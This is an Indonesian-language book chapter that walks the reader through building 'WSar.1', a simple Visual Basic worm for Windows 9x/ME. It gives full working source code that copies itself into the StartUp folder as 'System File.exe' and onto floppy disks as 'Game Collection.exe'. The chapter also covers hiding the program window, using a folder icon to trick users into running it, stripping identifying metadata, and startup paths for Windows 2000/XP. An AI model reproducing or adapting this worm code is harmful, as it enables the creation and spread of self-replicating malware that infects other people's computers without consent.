WORM WSar.1

7.1 WORM DASAR 1

Suatu worm dasar dapat dipandang sebagai satu set instruksi berisi sedikitnya tiga sub-rutin yang terpasang.

• Sub-rutin yang pertama berfungsi untuk melakukan penularan dengan cara membuat clonning (salinan) dirinya sendiri pada suatu system komputer, media penyimpanan atau melalui suatu jaringan.

• Sub-rutin yang kedua berfungsi sebagai live defender (rutin untuk bertahan hidup), yang akan memastikan suatu worm tetap eksis pada suatu host system

• Sub-rutin yang ketiga berfungsi sebagai pengatur payload (muatan maksud tertentu) yang mendikte suatu tindakan untuk dieksekusi. Payload ini pada teorinya bisa berupa apa saja seperti menghapus data, memasang backdoor atau memformat harddisk. Sub-rutin pelengkap lainnya bisa saja sebagai penentu kapan payload tersebut dilakukan.

Bab 7. Worm WSar.1

7..2 ALGORITMA

Worm ini bernama WSar.1 (worm dasar 1) yang menggunakan icon dengan gambar sebuah folder dan nama yang unik agar menarik minat user untuk mengeksekusinya, merupakan worm yang sangat sederhana sekali, sehingga hanya dapat menginfeksi sistem operasi Windows 9x dan ME yang terinstal secara default pada drive C. WSar.1 memiliki rutin-rutin yang akan melakukan tindakan sebagai berikut:

1. Melakukan pemeriksaan terhadap eksistensi worm itu sendiri pada system komputer

2. Jika worm tidak mendapatkan eksistensinya maka worm akan melakukan reproduksi dengan menciptakan salinan dirinya pada direktori StartUp pada Startmenu

3. Setiap 1 menit berusaha untuk membuat salinan worm ke disket pada drive A

4. Setiap tanggal 13 bulan Oktober akan menampilkan pesan "WSar.1 Ada Pada Komputer Anda" dan menghentikan segala aktifitas worm pada hari tersebut.

7.3 PEMROGRAMAN

Buka aplikasi Visual Basic. Pada kotak dialog New Project klik icon Standard EXE pada tab New dan klik Open, untuk menampilkan kotak dialog New Project bisa dengan klik File pada menubar kemudian pilih New Project.

Bab 7. Worm WSar.1 Visual basic secara otomatis m e m b e r i k a n sebuah project dengan nama default Project1 dan sebuah form di dalam-nya dengan nama default Form1.

Sebagai langkah pertama, aturlah Project Properties dengan mengklik kanan nama project pada jendela Project Explorer yang dalam hal ini nama project masih bernama Project1, kemudian klik 'Project1 Properties…’

Bab 7. Worm WSar.1

Akan tampil kotak dialog Project Properties dan berada pada tab General.

Ganti Project Name dari nama Project1 menjadi nama worm yaitu: WSar. Dalam pengisian Project Name, tidak boleh meng-gunakan spasi, tanda titik, tanda koma atau karakter spesial lainnya. Untuk melanjutkan pin-dah ke menu Make den-gan mengklik tab Make.

Ganti Application Title dari nama Project1 menjadi nama worm yaitu: WSar.1 kemudian hapus value untuk setiap Type pada frame Version Information, terutama untuk Type Company Name.

Tentunya Anda tidak ingin nama perusahaan tempat Anda bekerja menjadi terkenal oleh worm ini bukan  ? Jika value yang dihapus ternyata kembali saat project di-load Anda bisa menghapusnya lagi dan menambahkan sebuah karakter spasi. Kemudian pindah ke menu Compile dengan

Bab 7. Worm WSar.1

Pilih opsi Compile to P-Code. Opsi ini akan membuat program yang dihasilkan berukuran lebih kecil daripada meng-gunakan opsi Compile to Native Code. Akhiri dengan menekan tombol OK.

Langkah kedua adalah mengatur properties pada form, dengan mengklik nama form pada jendela Project Explorer.

Dalam hal ini, nama form masih bernama Form1, secara otomatis segala properti pada Form1 akan ditampilkan pada jendela Proper-ties. Anda juga bisa meng-klik ComboBox pada jendela Properties dan pilih object Form1.

Bab 7. Worm WSar.1

Kemudian atur jenis properti berikut ini pada Form1:

Jenis Nilai Keterangan

Name frmWSar1 Mengatur nama form menjadi frmWSar1

Icon (Icon) Pilih icon yang akan digunakan pada form, WSar.1 menggunakan icon folder. ico

ShowInTaskbar False Tidak menampilkan form pada taskbar

Visible False Tidak menampilkan form pada layar.

Langkah ketiga adalah menambahkan object Timer pada form yang bertujuan untuk melakukan perulangan terhadap instruksi tertentu tanpa memerlukan suatu interaksi oleh user.

Untuk itu klik ganda object Timer pada toolbox yang akan membuat sebuah object Timer dengan nama default Timer1, kemudian atur jenis properti berikut ini pada Timer1:

Jenis Nilai Keterangan

Name tmrWSar Mengatur nama Timer menjadi tmrWSar Enable True Pastikan Timer akan aktif saat form di-load Interval 60000 Setiap instruksi pada procedure Timer akan

dieksekusi setiap 1 menit

Langkah keempat adalah mengetikan kode program worm. Untuk itu klik ganda bidang form hingga jendela Code Editor tampil dengan langsung membuat suatu sub 'Form Load’. Anda juga bisa meng-klik nama form pada jendela Explorer, klik tombol View Code kemudian klik Com-boBox Object pada Code Editor dan pilih Form, klik ComboBox Event dan pilih Load.

Bab 7. Worm WSar.1

Ketik kode program berikut ini:

'WSar.1 by Achmad Darmal

'Tarakan, Kalimantan Timur - Indonesia Option Explicit On

Private Sub Form_Load() On Error Resume Next

If App.PrevInstance = True Then End

If Len(Dir$("C:\WINDOWS\Start Menu\Programs\StartUp\Syst" & _ "em File.exe")) = 0 Then

FileCopy(WormFile, "C:\WINDOWS\Start Menu\Programs\Star" & _ "tUp\System File.exe")

End If

If App.Path = "A:\" Or App.Path = "B:\" Then Unload(Me)

End If End Sub

Private Sub tmrWSar_Timer() On Error Resume Next

If Len(Dir$("A:\Game Collection.exe")) = 0 Then FileCopy(WormFile, "A:\Game Collection.exe") End If

If Day(Now) = 13 And Month(Now) = 10 Then MsgBox("WSar.1 Ada Pada Komputer Anda") Unload(Me)

End If End Sub

Private Function WormFile() Dim WPath, WName As String WPath = App.Path

If Right(WPath, 1) <> "\" Then WPath = WPath & "\" End If

WName = App.EXEName & ".exe" WormFile = WPath & WName End Function

Bab 7. Worm WSar.1

Berikut penjelasan tentang kode program:

'WSar.1 by Achmad Darmal

'Tarakan, Kalimantan Timur – Indonesia Option Explicit

Dua baris teratas adalah baris komentar, diawali dengan single quote. Biasanya digunakan untuk memberi keterangan tentang program atau apapun yang ingin programmer sampaikan kepada pengguna kode tersebut. Statement Option Explicit pada baris ketiga memastikan agar seluruh variabel dideklarasikan.

Private Sub Form_Load()

Baris ini menandakan awal dari sebuah procedure, dalam hal ini adalah procedure yang akan dikerjakan pada event Form_Load, suatu kejadian saat form diaktifkan untuk pertama kali atau sesaat sebelum ditampilkan.

On Error Resume Next

Statement ini akan sangat berguna apabila terjadi suatu kesalahan, karena program akan mengacuhkan kesalahan tersebut dan kemudian mengakses instruksi setelahnya.

If App.PrevInstance = True Then End

Jika file aplikasi yang sama sudah berjalan maka akhiri proses pengek-sekusian file tersebut. Statement ini berguna untuk mencegah suatu file aplikasi yang sama dieksekusi lebih dari satu kali.

If Len(Dir$("C:\WINDOWS\Start Menu\Programs\Star" & _ "tUp\System File.exe")) = 0 Then

Jika banyak karakter dalam pencarian "C:\WINDOWS\Start Menu\ Programs\StartUp\System File.exe" adalah 0 (nol) maka file tersebut tidak ditemukan (sebaliknya akan menghasilkan nilai 15 jika file terse-but ditemukan. Nilai 15 berasal dari jumlah karakter pada nama file), maka…

Bab 7. Worm WSar.1 FileCopy WormFile, "C:\WINDOWS\Start Menu\Prog" & _

"rams\StartUp\System File.exe"

FileCopy adalah function untuk membuat salinan suatu file. WormFile mewakili nama main file (file utama) yang terproses. WormFile adalah suatu function untuk mendapatkan full path (alamat penuh) file utama, Sedangkan "C:\WINDOWS\StartMenu\Programs\StartUp\System File.ex e" adalah lokasi dan nama file untuk tujuan penyalinan file,

If App.Path = "A:\" Or App.Path = "B:\" Then Unload Me

End If

Jika path file utama pada drive A atau pada drive B maka akhiri aplikasi. Statement ini bertujuan untuk mencegah file worm yang berada pada disket bertahan di memory. Hal ini sebaiknya juga dilakukan untuk setiap removable disk, seperti disket dan usb disk. Akhirnya, End If digunakan untuk menutup statement If sebelumnya.

End Sub

Statement End Sub berfungsi untuk mengakhiri procedure Form_Load.

Private Sub tmrWSar_Timer() On Error Resume Next

If Len(Dir$("A:\Game Collection.exe")) = 0 Then FileCopy(WormFile, "A:\Game Collection.exe") End If

If Day(Now) = 13 And Month(Now) = 10 Then MsgBox("WSar.1 Ada Pada Komputer Anda") Unload(Me)

End If End Sub

Memulai suatu procedure baru terhadap object tmrWSar (Timer), men-gacuhkan error apabila terjadi dan mengeksekusi instruksi setelahnya. Jika file "A:\Game Collection.exe" tidak ditemukan maka meng-copy file utama ke drive A dengan nama "Game Collection.exe".

(Okto-Bab 7. Worm WSar.1

ber) maka tampilkan pesan "WSar.1 Ada Pada Komputer Anda" serta bersihkan worm dari memory, sehingga untuk hari tersebut worm tidak akan melakukan aktifitas apapun.

Private Function WormFile() Dim WPath, WName As String WPath = App.Path

If Right(WPath, 1) <> "\" Then WPath = WPath & "\" End If

WName = App.EXEName & ".exe" WormFile = WPath & WName End Function

Function WormFile dibuat untuk mendapatkan path penuh file utama, dimulai dengan pendeklarasian WPath untuk lokasi dan WName untuk nama file, kemudian menentukan lokasi file utama dengan func-tion App.Path dan menyimpannya dalam variabel WPath..

Jika satu karakter disebelah kanan nilai variabel WPath tidak sama dengan "\" maka nilai variabel WPath ditambahkan karakter "\" di-belakangnya, kemudian mengatur nilai variabel WName dengan nilai berupa nama file utama yang didapat dari function App.EXEName. Karena nama file yang didapatkan dari function ini belum memiliki ekstensi, maka ditambahkan string ".exe" dibelakangnya, menandakan file tersebut adalah file executable.

Langkah kelima adalah meny-impan project yang telah sele-sai dibuat, dengan meng-click File pada menubar kemudian pilih Save Project.

Bab 7. Worm WSar.1

Kemudian akan tampil kotak dialog Save File As, yang berfungsi untuk menyimpan form, module dan sebagainya yang akan disimpan. Tentukan suatu folder atau buat folder baru dengan mengklik tombol New Folder.

Berikutnya akan tampil kotak dialog Save Project As, yang berfungsi untuk menyimpan project secara keseluruhan.

Langkah terakhir adalah mengkom-pilasi project menjadi suatu file executable. Untuk itu klik File pada menubar, kemu-dian dalam hal ini klik Make WSar. Exe yang akan m e n a m p i l k a n kotak dialog Make Project,

Bab 7. Worm WSar.1

Isi TextBox File name dengan nama File Exe yang akan dibuat yang dalam contoh ini bernama WSar.exe. Pilih direktori tempat file tersebut akan diletakkan. Klik OK untuk memulai proses kompilasi.

Catatan untuk WSar.1 : untuk lokasi direktori StartUp pada Windows

2000 dan XP secara default adalah sebagai berikut:

1. C:\Documents and Settings\Administrator\Start Menu\ Pro-grams\startup

2. C:\Documents and Settings\All Users\Start Menu\Progra ms\ startup

3. C:\Documents and Settings\Default User\Start Menu\ Programs\ startup

Bab 8. Worm WSar.2

BAB 8